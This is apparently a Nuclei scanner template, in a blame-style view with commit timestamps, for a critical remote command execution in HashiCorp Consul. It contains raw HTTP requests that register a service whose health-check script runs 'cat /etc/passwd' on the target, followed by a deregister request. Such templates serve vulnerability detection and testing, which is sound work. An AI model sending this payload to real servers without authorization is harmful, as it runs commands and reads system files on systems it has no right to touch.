2021-02-26 09:02:50 +00:00
|
|
|
id: hashicorp-consul-rce
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Hashicorp Consul Services Api RCE
|
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
|
|
|
reference: https://www.exploit-db.com/exploits/46074
|
|
|
|
|
2021-02-26 11:06:28 +00:00
|
|
|
# Check Output File /etc/passwd: https://redacted/ui/#/dc1/nodes/consul
|
|
|
|
|
2021-02-26 09:02:50 +00:00
|
|
|
requests:
|
2021-02-26 11:06:28 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
PUT /v1/agent/service/register HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
Accept-Language: id,en-US;q=0.7,en;q=0.3
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
DNT: 1
|
|
|
|
Connection: close
|
|
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
Content-Length: 205
|
|
|
|
|
|
|
|
{
|
|
|
|
"ID": "consul",
|
|
|
|
"Name": "consul",
|
|
|
|
"Address": "127.0.0.1",
|
|
|
|
"Port": 80,
|
|
|
|
"check": {
|
|
|
|
"script": "cat /etc/passwd",
|
|
|
|
"Args": ["cat /etc/passwd"],
|
|
|
|
"interval": "10s",
|
|
|
|
"Timeout": "86400s"
|
|
|
|
}
|
|
|
|
}
|
|
|
|
- |
|
|
|
|
PUT /v1/agent/service/deregister/consul HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
|
|
Connection: close
|
2021-02-26 09:02:50 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-02-26 11:06:28 +00:00
|
|
|
- "Deregistering the consul service is not allowed"
|
2021-02-26 09:02:50 +00:00
|
|
|
part: body
|
2021-02-26 11:06:28 +00:00
|
|
|
condition: and
|
2021-02-26 09:02:50 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2021-02-26 11:06:28 +00:00
|
|
|
- 500
|